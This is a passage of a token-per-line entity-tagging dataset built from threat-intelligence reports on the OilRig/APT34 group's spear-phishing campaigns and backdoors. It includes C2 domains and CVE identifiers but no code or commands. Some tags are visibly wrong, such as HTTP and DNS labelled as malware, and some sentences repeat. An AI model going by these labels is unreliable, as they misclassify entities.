+service I-IDTY
+providers E-IDTY
+offering O
+service O
+and O
+technical O
+troubleshooting O
+as O
+a O
+social B-IDTY
+engineering E-IDTY
+theme O
+in O
+their O
+spear-phishing S-ACT
+attacks E-ACT
+. O
+
+The O
+campaign O
+appears O
+highly O
+targeted O
+and O
+delivers O
+a O
+backdoor O
+we O
+have O
+called O
+' O
+Helminth S-MAL
+' O
+. O
+
+Artifacts O
+identified O
+within O
+the O
+malware O
+samples O
+related O
+to O
+these O
+attacks O
+also O
+suggest O
+the O
+targeting O
+of O
+the O
+defense B-IDTY
+industry E-IDTY
+in O
+Saudi B-LOC
+Arabia E-LOC
+, O
+which O
+appears O
+to O
+be O
+related O
+to O
+an O
+earlier O
+wave O
+of O
+attacks O
+carried O
+out O
+in O
+the O
+fall B-TIME
+of I-TIME
+2015 E-TIME
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+began O
+researching O
+attacks O
+that O
+used O
+spear-phishing S-ACT
+emails I-ACT
+with I-ACT
+attachments E-ACT
+, O
+specifically O
+malicious O
+Excel B-ACT
+spreadsheets E-ACT
+sent O
+to O
+financial B-IDTY
+organizations E-IDTY
+within O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+Over O
+the O
+course O
+of O
+the O
+attack B-ACT
+campaign E-ACT
+, O
+we O
+have O
+observed O
+two O
+different O
+variations O
+of O
+the O
+Helminth B-MAL
+backdoor E-MAL
+, O
+one O
+written O
+in O
+VBScript O
+and O
+PowerShell S-TOOL
+that O
+was O
+delivered O
+via O
+a O
+macro O
+within O
+Excel B-ACT
+spreadsheets E-ACT
+and O
+the O
+other O
+a O
+standalone O
+Windows B-ACT
+executable E-ACT
+. O
+
+FireEye S-SECTEAM
+also O
+reported O
+on O
+these O
+attacks O
+in O
+a O
+May B-TIME
+22 E-TIME
+blog O
+post O
+. O
+
+The O
+executable O
+variant O
+of O
+Helminth S-MAL
+is O
+installed O
+with O
+a O
+dropper B-MAL
+Trojan E-MAL
+that O
+we O
+are O
+tracking O
+as O
+the O
+HerHer B-MAL
+Trojan E-MAL
+. O
+
+The O
+Helminth S-MAL
+executable O
+variant O
+is O
+very O
+similar O
+in O
+functionality O
+to O
+its O
+script-based O
+counterpart O
+, O
+as O
+it O
+also O
+communicates O
+with O
+its O
+C2 S-TOOL
+server O
+using O
+both O
+HTTP S-MAL
+and O
+DNS S-MAL
+queries O
+. O
+
+Helminth S-MAL
+executable O
+samples O
+send O
+artifacts O
+within O
+network B-ACT
+beacons E-ACT
+to O
+its O
+C2 S-TOOL
+server O
+that O
+the O
+Trojan S-MAL
+refers O
+to O
+as O
+a O
+' O
+Group O
+' O
+and O
+' O
+Name O
+' O
+. O
+
+It O
+appears O
+that O
+the O
+group O
+values O
+hardcoded O
+into O
+the O
+malware O
+is O
+associated O
+with O
+the O
+targeted O
+organization O
+, O
+as O
+several O
+are O
+Saudi B-LOC
+Arabian E-LOC
+organizations O
+within O
+the O
+telecommunications S-IDTY
+and O
+defense B-IDTY
+industries E-IDTY
+. O
+
+It O
+appears O
+that O
+the O
+group O
+values O
+hardcoded O
+into O
+the O
+malware O
+is O
+associated O
+with O
+the O
+targeted O
+organization O
+, O
+as O
+several O
+are O
+Saudi B-LOC
+Arabian E-LOC
+organizations O
+within O
+the O
+telecommunications S-IDTY
+and O
+defense B-IDTY
+industries E-IDTY
+. O
+
+This O
+suggests O
+that O
+the O
+threat O
+actors S-APT
+are O
+not O
+only O
+focused O
+on O
+financial B-IDTY
+organizations E-IDTY
+, O
+as O
+their O
+target O
+set O
+could O
+include O
+other O
+industries O
+as O
+well O
+. O
+
+The O
+email S-TOOL
+address O
+edmundj@chmail.ir O
+and O
+the O
+geolocation O
+of O
+Tehran S-LOC
+, O
+Iran S-LOC
+, O
+being O
+of O
+note O
+. O
+
+The O
+registrant O
+information O
+for O
+kernel.ws O
+also O
+provided O
+a O
+geolocation O
+of O
+Tehran S-LOC
+, O
+IR S-LOC
+and O
+the O
+email B-IDTY
+provider E-IDTY
+for O
+the O
+address O
+used O
+in O
+checkgoogle.org O
+was O
+the O
+same O
+used O
+for O
+mydomain1607.com O
+, O
+chmail.ir O
+. O
+
+The O
+mydomain1110.com O
+domain O
+did O
+not O
+appear O
+to O
+reuse O
+any O
+of O
+the O
+previously O
+observed O
+WHOIS O
+data O
+artifacts O
+, O
+but O
+did O
+still O
+give O
+a O
+geolocation O
+of O
+Tehran S-LOC
+in O
+addition O
+to O
+the O
+use O
+of O
+an O
+email S-TOOL
+address O
+linked O
+to O
+other O
+domains O
+thematically O
+similar O
+to O
+the O
+know O
+command O
+and O
+control O
+domains O
+and O
+are O
+potentially O
+related O
+. O
+
+While O
+researching O
+the O
+OilRig B-ACT
+campaign E-ACT
+, O
+we O
+have O
+seen O
+two O
+waves O
+of O
+targeted B-ACT
+attacks E-ACT
+on O
+Saudi B-LOC
+Arabian E-LOC
+organizations O
+in O
+which O
+a O
+group O
+of O
+threat O
+actors S-APT
+delivered O
+the O
+Helminth B-ACT
+Trojan E-ACT
+as O
+a O
+payload O
+. O
+
+The O
+two O
+variants O
+of O
+Helminth S-MAL
+do O
+require O
+different O
+delivery O
+methods O
+, O
+with O
+the O
+script O
+variant O
+relying O
+on O
+an O
+Excel B-ACT
+spreadsheet E-ACT
+for O
+delivery O
+, O
+while O
+the O
+executable B-ACT
+variant E-ACT
+is O
+more O
+traditional O
+in O
+the O
+fact O
+that O
+it O
+can O
+be O
+installed O
+without O
+a O
+delivery O
+document O
+. O
+
+Since O
+our O
+first O
+published O
+analysis O
+of O
+the O
+OilRig B-ACT
+campaign E-ACT
+in O
+May B-TIME
+2016 E-TIME
+, O
+we O
+have O
+continued O
+to O
+monitor O
+this O
+group O
+for O
+new O
+activity O
+. O
+
+Additionally O
+, O
+the O
+scope O
+of O
+organizations O
+targeted O
+by O
+this O
+group O
+has O
+expanded O
+to O
+not O
+only O
+include O
+organizations O
+within O
+Saudi B-LOC
+Arabia E-LOC
+, O
+but O
+also O
+a O
+company O
+in O
+Qatar S-LOC
+and O
+government B-IDTY
+organizations E-IDTY
+in O
+Turkey S-LOC
+, O
+Israel S-LOC
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+The O
+group O
+behind O
+the O
+OilRig B-ACT
+campaign E-ACT
+continues O
+to O
+leverage O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+malicious O
+Microsoft B-ACT
+Excel I-ACT
+documents E-ACT
+to O
+compromise O
+victims O
+. O
+
+In O
+addition O
+to O
+these O
+instances O
+, O
+multiple O
+Qatari B-IDTY
+organizations E-IDTY
+were O
+the O
+subject O
+to O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+carrying O
+Helminth B-MAL
+samples E-MAL
+earlier O
+this O
+year O
+. O
+
+While O
+the O
+malware O
+deployed O
+is O
+not O
+terribly O
+sophisticated O
+, O
+it O
+uses O
+techniques O
+such O
+as O
+DNS B-ACT
+command I-ACT
+and I-ACT
+control E-ACT
+( O
+C2 S-TOOL
+) O
+that O
+allows O
+it O
+to O
+stay O
+under O
+the O
+radar O
+at O
+many O
+establishments O
+. O
+
+Less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+for O
+CVE-2017-11882 S-VULID
+on O
+Nov. B-TIME
+14 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+FireEye S-SECTEAM
+observed O
+an O
+attacker S-APT
+using O
+an O
+exploit S-VULNAME
+for O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+to O
+target O
+a O
+government B-IDTY
+organization E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+We O
+assess O
+this O
+activity O
+was O
+carried O
+out O
+by O
+a O
+suspected O
+Iranian S-LOC
+cyber B-ACT
+espionage E-ACT
+threat O
+group O
+, O
+whom O
+we O
+refer O
+to O
+as O
+APT34 S-APT
+, O
+using O
+a O
+custom B-MAL
+PowerShell I-MAL
+backdoor E-MAL
+to O
+achieve O
+its O
+objectives O
+. O
+
+This O
+threat O
+group O
+has O
+conducted O
+broad O
+targeting O
+across O
+a O
+variety O
+of O
+industries O
+, O
+including O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+chemical S-IDTY
+, O
+and O
+telecommunications S-IDTY
+, O
+and O
+has O
+largely O
+focused O
+its O
+operations O
+within O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+We O
+assess O
+that O
+APT34 S-APT
+works O
+on O
+behalf O
+of O
+the O
+Iranian S-LOC
+government O
+based O
+on O
+infrastructure O
+details O
+that O
+contain O
+references O
+to O
+Iran S-LOC
+, O
+use O
+of O
+Iranian S-LOC
+infrastructure O
+, O
+and O
+targeting O
+that O
+aligns O
+with O
+nation-state O
+interests O
+. O
+
+APT34 S-APT
+uses O
+a O
+mix O
+of O
+public B-MAL
+and I-MAL
+non-public I-MAL
+tools E-MAL
+, O
+often O
+conducting O
+spear B-ACT
+phishing I-ACT
+operations E-ACT
+using O
+compromised B-MAL
+accounts E-MAL
+, O
+sometimes O
+coupled O
+with O
+social B-ACT
+engineering I-ACT
+tactics E-ACT
+. O
+
+We O
+believe O
+APT34 S-APT
+is O
+involved O
+in O
+a O
+long-term O
+Cyber B-ACT
+Espionage E-ACT
+operation O
+largely O
+focused O
+on O
+reconnaissance O
+efforts O
+to O
+benefit O
+Iranian S-LOC
+nation-state O
+interests O
+and O
+has O
+been O
+operational O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+we O
+published O
+a O
+blog O
+detailing O
+a O
+spear B-ACT
+phishing I-ACT
+campaign E-ACT
+targeting O
+banks S-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+that O
+used O
+macro-enabled O
+attachments O
+to O
+distribute O
+POWBAT S-MAL
+malware S-MAL
+. O
+
+In O
+July B-TIME
+2017 E-TIME
+, O
+we O
+observed O
+APT34 S-APT
+targeting O
+a O
+Middle B-LOC
+East E-LOC
+organization O
+using O
+a O
+PowerShell-based B-MAL
+backdoor E-MAL
+that O
+we O
+call O
+POWRUNER S-MAL
+and O
+a O
+downloader O
+with O
+domain O
+generation O
+algorithm O
+functionality O
+that O
+we O
+call O
+BONDUPDATER S-MAL
+, O
+based O
+on O
+strings O
+within O
+the O
+malware O
+. O
+
+APT34 S-APT
+loosely O
+aligns O
+with O
+public O
+reporting O
+related O
+to O
+the O
+group O
+" O
+OilRig S-APT
+" O
+. O
+
+The O
+backdoor O
+was O
+delivered O
+via O
+a O
+malicious O
+.rtf B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+this O
+latest O
+campaign O
+, O
+APT34 S-APT
+leveraged O
+the O
+recent O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+. O
+
+The O
+vulnerability O
+was O
+patched O
+by O
+Microsoft S-IDTY
+on O
+Nov B-TIME
+14 I-TIME
+, I-TIME
+2017 E-TIME
+. O
+
+The O
+vulnerability O
+exists O
+in O
+the O
+old O
+Equation B-MAL
+Editor E-MAL
+( O
+EQNEDT32.EXE S-MAL
+) O
+, O
+a O
+component O
+of O
+Microsoft S-IDTY
+Office O
+that O
+is O
+used O
+to O
+insert O
+and O
+evaluate O
+mathematical O
+formulas O
+. O
+
+During O
+the O
+past O
+few O
+months O
+, O
+APT34 S-APT
+has O
+been O
+able O
+to O
+quickly O
+incorporate O
+exploits O
+for O
+at O
+least O
+two O
+publicly O
+vulnerabilities O
+( O
+CVE-2017-0199 S-VULID
+and O
+CVE-2017-11882 S-VULID
+) O
+to O
+target O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+The O
+OilRig B-APT
+group E-APT
+( O
+AKA O
+APT34 S-APT
+, O
+Helix B-APT
+Kitten E-APT
+) O
+is O
+an O
+adversary O
+motivated O
+by O
+espionage S-ACT
+primarily O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+We O
+expect O
+APT34 S-APT
+will O
+continue O
+to O
+evolve O
+their O
+malware O
+and O
+tactics O
+as O
+they O
+continue O
+to O
+pursue O
+access O
+to O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+The O
+OilRig B-APT
+group E-APT
+( O
+AKA O
+APT34 S-APT
+, O
+Helix B-APT
+Kitten E-APT
+) O
+is O
+an O
+adversary O
+motivated O
+by O
+espionage S-ACT
+primarily O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+We O
+first O
+discovered O
+this O
+group O
+in O
+mid-2016 S-TIME
+, O
+although O
+it O
+is O
+possible O
+their O
+operations O
+extends O
+earlier O
+than O
+that O
+time O
+frame O
+. O
+
+Between O
+May S-TIME
+and O
+June B-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+observed O
+multiple O
+attacks O
+by O
+the O
+OilRig B-APT
+group E-APT
+appearing O
+to O
+originate O
+from O
+a O
+government B-IDTY
+agency E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+The O
+use O
+of O
+script-based B-MAL
+backdoors E-MAL
+is O
+a O
+common O
+technique O
+used O
+by O
+the O
+OilRig B-APT
+group E-APT
+as O
+we O
+have O
+previously O
+documented O
+. O
+
+The O
+attacks O
+delivered O
+a O
+PowerShell B-MAL
+backdoor E-MAL
+called O
+QUADAGENT S-MAL
+, O
+a O
+tool O
+attributed O
+to O
+the O
+OilRig B-APT
+group E-APT
+by O
+both O
+ClearSky B-SECTEAM
+Cyber I-SECTEAM
+Security E-SECTEAM
+and O
+FireEye S-SECTEAM
+. O
+
+A O
+closer O
+examination O
+revealed O
+the O
+obfuscation O
+used O
+by O
+the O
+OilRig B-APT
+group E-APT
+in O
+these O
+QUADAGENT B-MAL
+samples E-MAL
+were O
+likely O
+the O
+result O
+of O
+using O
+an O
+open-source O
+toolkit O
+called O
+Invoke-Obfuscation S-MAL
+. O
+
+All O
+three O
+waves O
+involved O
+a O
+single O
+spear B-ACT
+phishing I-ACT
+email E-ACT
+that O
+appeared O
+to O
+originate O
+from O
+a O
+government B-IDTY
+agency E-IDTY
+based O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+This O
+latest O
+attack O
+consisted O
+of O
+three O
+waves O
+between O
+May S-TIME
+and O
+June B-TIME
+2018 E-TIME
+. O
+
+The O
+OilRig B-APT
+group E-APT
+continues O
+to O
+be O
+a O
+persistent O
+adversary O
+group O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+APT34 S-APT
+are O
+involved O
+in O
+long-term O
+cyber B-ACT
+espionage I-ACT
+operations E-ACT
+largely O
+focused O
+on O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+This O
+threat O
+group O
+has O
+conducted O
+broad O
+targeting O
+across O
+a O
+variety O
+of O
+industries O
+, O
+including O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+chemical S-IDTY
+, O
+and O
+telecommunications S-IDTY
+. O
+
+Recent O
+investigations O
+by O
+FireEye B-SECTEAM
+'s I-SECTEAM
+Mandiant E-SECTEAM
+incident O
+response O
+consultants O
+combined O
+with O
+FireEye B-SECTEAM
+iSIGHT I-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+analysis O
+have O
+given O
+us O
+a O
+more O
+complete O
+picture O
+of O
+a O
+suspected O
+Iranian S-LOC
+threat O
+group O
+, O
+that O
+we O
+believe O
+has O
+been O
+operating O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+Join O
+us O
+in O
+a O
+live O
+webinar O
+as O
+we O
+discuss O
+this O
+threat O
+group O
+whom O
+we O
+assess O
+to O
+be O
+working O
+on O
+behalf O
+of O
+the O
+Iranian B-IDTY
+Government E-IDTY
+, O
+with O
+a O
+mission O
+that O
+would O
+benefit O
+nation-state B-IDTY
+geopolitical E-IDTY
+and O
+economic S-IDTY
+needs O
+. O
+
+On O
+January B-TIME
+8 I-TIME
+, I-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+observed O
+the O
+OilRig S-APT
+threat O
+group O
+carry O
+out O
+an O
+attack O
+on O
+an O
+insurance B-IDTY
+agency E-IDTY
+based O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+APT34 S-APT
+uses O
+a O
+mix O
+of O
+public B-MAL
+and I-MAL
+non-public I-MAL
+tools E-MAL
+, O
+often O
+conducting O
+spear B-ACT
+phishing I-ACT
+operations E-ACT
+using O
+compromised B-MAL
+accounts E-MAL
+from O
+trusted O
+third O
+parties O
+, O
+sometimes O
+coupled O
+with O
+social B-ACT
+engineering I-ACT
+tactics E-ACT
+. O
+
+Just O
+over O
+a O
+week O
+later O
+, O
+on O
+January B-TIME
+16 I-TIME
+, I-TIME
+2018 E-TIME
+, O
+we O
+observed O
+an O
+attack O
+on O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+institution E-IDTY
+. O
+
+The O
+January B-ACT
+8 I-ACT
+attack E-ACT
+used O
+a O
+variant O
+of O
+the O
+ThreeDollars B-FILE
+delivery I-FILE
+document E-FILE
+, O
+which O
+we O
+identified O
+as O
+part O
+of O
+the O
+OilRig S-APT
+toolset O
+based O
+on O
+attacks O
+that O
+occurred O
+in O
+August B-TIME
+2017 E-TIME
+. O
+
+However O
+, O
+the O
+attack O
+on O
+January B-TIME
+16 E-TIME
+did O
+not O
+involve O
+ThreeDollars S-MAL
+at O
+all O
+. O
+
+Interestingly O
+, O
+the O
+targeted O
+organization O
+in O
+the O
+January B-ACT
+16 I-ACT
+attack E-ACT
+had O
+already O
+been O
+targeted O
+by O
+the O
+OilRig B-APT
+group E-APT
+a O
+year O
+ago O
+on O
+January B-TIME
+2017 E-TIME
+. O
+
+Instead O
+, O
+OilRig S-APT
+'s O
+attack O
+involved O
+delivering O
+the O
+OopsIE B-MAL
+Trojan E-MAL
+directly O
+to O
+the O
+victim O
+, O
+most O
+likely O
+using O
+a O
+link O
+in O
+a O
+spear B-ACT
+phishing I-ACT
+email E-ACT
+. O
+
+In O
+the O
+January B-TIME
+16 E-TIME
+, O
+2018 B-ACT
+attack E-ACT
+, O
+we O
+observed O
+OilRig O
+attacking O
+an O
+organization O
+it O
+previously O
+targeted O
+in O
+January B-TIME
+2017 E-TIME
+. O
+
+On O
+January B-TIME
+8 I-TIME
+, I-TIME
+2018 E-TIME
+, O
+the O
+OilRig S-APT
+threat O
+group O
+sent O
+an O
+email S-ACT
+with O
+the O
+subject O
+Beirut O
+Insurance O
+Seminar O
+Invitation O
+to O
+an O
+insurance B-IDTY
+agency E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+The O
+email S-ACT
+contained O
+an O
+attachment O
+named O
+Seminar-Invitation.doc S-FILE
+, O
+which O
+is O
+a O
+malicious O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+we O
+track O
+as O
+ThreeDollars S-MAL
+. O
+
+This O
+suggests O
+that O
+due O
+to O
+the O
+January B-ACT
+2017 I-ACT
+attack E-ACT
+, O
+the O
+targeted O
+organization O
+may O
+have O
+taken O
+actions O
+to O
+counter O
+known O
+OilRig S-APT
+TTPs O
+, O
+in O
+this O
+case O
+delivering O
+malicious O
+macro O
+documents O
+, O
+causing O
+the O
+OilRig S-APT
+operators S-APT
+to O
+adopt O
+a O
+different O
+delivery O
+tactic O
+. O
+
+We O
+also O
+identified O
+another O
+sample O
+of O
+ThreeDollars S-MAL
+, O
+created O
+on O
+January B-TIME
+15 E-TIME
+, O
+2017 S-TIME
+with O
+the O
+file O
+name O
+strategy O
+preparation.dot S-FILE
+. O
+
+The O
+samples O
+of O
+ThreeDollars S-MAL
+we O
+collected O
+in O
+these O
+attacks O
+are O
+structurally O
+very O
+similar O
+to O
+the O
+first O
+sample O
+we O
+analyzed O
+in O
+October B-TIME
+2017 E-TIME
+, O
+down O
+to O
+the O
+lure O
+image O
+used O
+to O
+trick O
+the O
+recipient O
+into O
+clicking O
+the O
+" O
+Enable O
+Content O
+" O
+button O
+to O
+execute O
+the O
+malicious O
+macro O
+. O
+
+Since O
+May B-TIME
+2016 E-TIME
+, O
+we O
+have O
+continued O
+to O
+monitor O
+and O
+uncover O
+various O
+attacks O
+and O
+tools O
+associated O
+with O
+the O
+OilRig B-APT
+group E-APT
+. O
+
+] O
+com O
+, O
+which O
+we O
+previously O
+identified O
+in O
+October B-TIME
+2017 E-TIME
+to O
+be O
+an O
+OilRig S-APT
+C2 S-TOOL
+. O
+
+Based O
+on O
+previously O
+observed O
+tactics O
+, O
+it O
+is O
+highly O
+likely O
+the O
+OilRig B-APT
+group E-APT
+leveraged O
+credential B-MAL
+harvesting E-MAL
+and O
+compromised B-MAL
+accounts E-MAL
+to O
+use O
+the O
+government B-IDTY
+agency E-IDTY
+as O
+a O
+launching O
+platform O
+for O
+their O
+true O
+attacks O
+. O
+
+Inspecting O
+the O
+class O
+C S-TOOL
+network O
+for O
+185.162.235.0/24 O
+shows O
+us O
+that O
+another O
+IP S-PROT
+on O
+the O
+same O
+network O
+resolves O
+to O
+an O
+OilRig S-APT
+domain O
+, O
+msoffice-cdn.com O
+which O
+we O
+identified O
+in O
+August B-TIME
+2017 E-TIME
+. O
+
+We O
+had O
+previously O
+observed O
+this O
+author O
+name O
+in O
+use O
+once O
+before O
+, O
+in O
+the O
+very O
+first O
+ThreeDollars B-FILE
+document E-FILE
+we O
+collected O
+that O
+we O
+had O
+reported O
+on O
+in O
+August B-TIME
+2017 E-TIME
+. O
+
+The O
+OilRig B-APT
+group E-APT
+continues O
+to O
+remain O
+a O
+highly O
+active O
+adversary O
+in O
+the O
+Middle B-LOC
+East E-LOC
+region O
+. O
+
+Organizations O
+detected O
+a O
+compromise O
+themselves O
+in O
+62% O
+of O
+the O
+cases O
+that O
+Mandiant S-SECTEAM
+worked O
+in O
+2017 S-TIME
+. O
+
+The O
+group O
+conducts O
+operations O
+primarily O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+targeting O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+chemical S-IDTY
+, O
+telecommunications S-IDTY
+and O
+other O
+industries O
+. O
+
+Repeated O
+targeting O
+of O
+Middle B-LOC
+Eastern E-LOC
+financial S-IDTY
+, O
+energy S-IDTY
+and O
+government B-IDTY
+organizations E-IDTY
+leads O
+FireEye S-SECTEAM
+to O
+assess O
+that O
+those O
+sectors O
+are O
+a O
+primary O
+concern O
+of O
+APT34 S-APT
+. O
+
+The O
+use O
+of O
+infrastructure O
+tied O
+to O
+Iranian S-LOC
+operations O
+, O
+timing O
+and O
+alignment O
+with O
+the O
+national O
+interests O
+of O
+Iran S-LOC
+also O
+lead O
+FireEye S-SECTEAM
+to O
+assess O
+that O
+APT34 S-APT
+acts O
+on O
+behalf O
+of O
+the O
+Iranian S-LOC
+government O
+. O
+
+APT34 S-APT
+uses O
+a O
+mix O
+of O
+public O
+and O
+non-public O
+tools O
+and O
+often O
+uses O
+compromised O
+accounts O
+to O
+conduct O
+spear-phishing S-ACT
+operations O
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+APT34 S-APT
+leveraged O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+'s O
+ongoing O
+research O
+into O
+the O
+OilRig B-ACT
+campaign E-ACT
+shows O
+that O
+the O
+threat O
+actors S-APT
+involved O
+in O
+the O
+original O
+attack B-ACT
+campaign E-ACT
+continue O
+to O
+add O
+new O
+Trojans O
+to O
+their O
+toolset O
+and O
+continue O
+their O
+persistent O
+attacks O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+When O
+we O
+first O
+discovered O
+the O
+OilRig B-ACT
+attack I-ACT
+campaign E-ACT
+in O
+May B-TIME
+2016 E-TIME
+, O
+we O
+believed O
+at O
+the O
+time O
+it O
+was O
+a O
+unique O
+attack B-ACT
+campaign E-ACT
+likely O
+operated O
+by O
+a O
+known O
+, O
+existing O
+threat O
+group O
+. O
+
+The O
+email S-TOOL
+address O
+is O
+associated O
+with O
+the O
+Lebanese O
+domain O
+of O
+a O
+major O
+global O
+financial B-IDTY
+institution E-IDTY
+. O
+
+POWRUNER S-MAL
+was O
+delivered O
+using O
+a O
+malicious B-MAL
+RTF E-MAL
+file O
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+July B-TIME
+2017 E-TIME
+, O
+we O
+observed O
+the O
+OilRig B-APT
+group E-APT
+using O
+a O
+tool O
+they O
+developed O
+called O
+ISMAgent S-MAL
+in O
+a O
+new O
+set O
+of O
+targeted B-ACT
+attacks E-ACT
+. O
+
+In O
+August B-TIME
+2017 E-TIME
+, O
+we O
+found O
+this O
+threat O
+group O
+has O
+developed O
+yet O
+another O
+Trojan S-MAL
+that O
+they O
+call O
+' O
+Agent O
+Injector O
+' O
+with O
+the O
+specific O
+purpose O
+of O
+installing O
+the O
+ISMAgent B-MAL
+backdoor E-MAL
+. O
+
+On O
+August B-TIME
+23 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+we O
+observed O
+OilRig S-APT
+targeting O
+an O
+organization O
+within O
+the O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+government S-IDTY
+. O
+
+Based O
+on O
+that O
+research O
+and O
+this O
+observation O
+, O
+we O
+postulate O
+that O
+the O
+OilRig B-APT
+group E-APT
+gathered O
+credentials O
+to O
+a O
+legitimate O
+user O
+'s O
+OWA O
+account O
+and O
+logged O
+into O
+the O
+user O
+'s O
+account O
+to O
+send O
+phishing B-ACT
+attacks E-ACT
+to O
+other O
+individuals O
+within O
+the O
+same O
+, O
+targeted O
+organization O
+. O
+
+The O
+OilRig B-APT
+group E-APT
+continues O
+to O
+target O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+in O
+this O
+instance O
+targeting O
+the O
+government S-IDTY
+of O
+the O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+. O
+
+The O
+payload O
+embedded O
+within O
+the O
+ISMInjector B-MAL
+sample E-MAL
+delivered O
+in O
+this O
+attack O
+is O
+a O
+variant O
+of O
+the O
+ISMAgent B-MAL
+backdoor E-MAL
+that O
+we O
+had O
+discussed O
+in O
+detail O
+in O
+our O
+blog O
+discussing O
+a O
+targeted B-ACT
+attack E-ACT
+on O
+a O
+Saudi B-LOC
+Arabian E-LOC
+technology B-IDTY
+company E-IDTY
+. O
+
+Initial O
+inspection O
+of O
+this O
+attack O
+suggested O
+this O
+was O
+again O
+the O
+OilRig B-ACT
+campaign E-ACT
+using O
+their O
+existing O
+toolset O
+, O
+but O
+further O
+examination O
+revealed O
+not O
+only O
+new O
+variants O
+of O
+the O
+delivery O
+document O
+we O
+named O
+Clayslide S-MAL
+, O
+but O
+also O
+a O
+different O
+payload O
+embedded O
+inside O
+it O
+. O
+
+In O
+July B-TIME
+2017 E-TIME
+, O
+we O
+observed O
+an O
+attack O
+on O
+a O
+Middle B-LOC
+Eastern E-LOC
+technology B-IDTY
+organization E-IDTY
+that O
+was O
+also O
+targeted O
+by O
+the O
+OilRig B-ACT
+campaign E-ACT
+in O
+August B-TIME
+2016 E-TIME
+. O
+
+This O
+technique O
+was O
+observed O
+in O
+previous O
+Clayslide B-MAL
+documents E-MAL
+to O
+access O
+the O
+script O
+variant O
+of O
+the O
+Helminth B-ACT
+Trojan E-ACT
+in O
+earlier O
+OilRig B-ACT
+attacks E-ACT
+. O
+
+In O
+the O
+past O
+, O
+we O
+had O
+primarily O
+associated O
+the O
+OilRig B-ACT
+campaign E-ACT
+with O
+using O
+the O
+Clayslide B-MAL
+documents E-MAL
+to O
+deliver O
+as O
+a O
+payload O
+a O
+Trojan S-MAL
+we O
+named O
+Helminth S-MAL
+; O
+in O
+this O
+instance O
+, O
+the O
+payload O
+was O
+instead O
+a O
+variant O
+of O
+the O
+ISMDoor B-MAL
+Trojan E-MAL
+with O
+significant O
+modifications O
+which O
+we O
+are O
+now O
+tracking O
+as O
+ISMAgent S-MAL
+. O
+
+The O
+June B-TIME
+2017 E-TIME
+sample O
+of O
+Clayslide S-MAL
+contained O
+the O
+same O
+OfficeServicesStatus.vbs B-FILE
+file E-FILE
+found O
+in O
+the O
+ISMAgent B-MAL
+Clayslide I-MAL
+document E-MAL
+, O
+but O
+instead O
+of O
+having O
+the O
+payload O
+embedded O
+in O
+the O
+macro O
+as O
+segregated O
+base64 O
+strings O
+that O
+would O
+be O
+concatenated O
+, O
+this O
+variant O
+obtained O
+its O
+payload O
+from O
+multiple O
+cells O
+within O
+the O
+" O
+Incompatible O
+" O
+worksheet O
+. O
+
+Clearly O
+, O
+OilRig S-APT
+incorporates O
+a O
+testing O
+component O
+within O
+their O
+development O
+process O
+, O
+as O
+we O
+have O
+previously O
+observed O
+OilRig S-APT
+performing O
+testing B-ACT
+activities E-ACT
+on O
+their O
+delivery B-MAL
+documents E-MAL
+and O
+their O
+TwoFace B-MAL
+webshells E-MAL
+. O
+
+While O
+continuing O
+research O
+on O
+the O
+August B-ACT
+2018 I-ACT
+attacks E-ACT
+on O
+a O
+Middle B-LOC
+eastern E-LOC
+government S-IDTY
+that O
+delivered O
+BONDUPDATER S-MAL
+, O
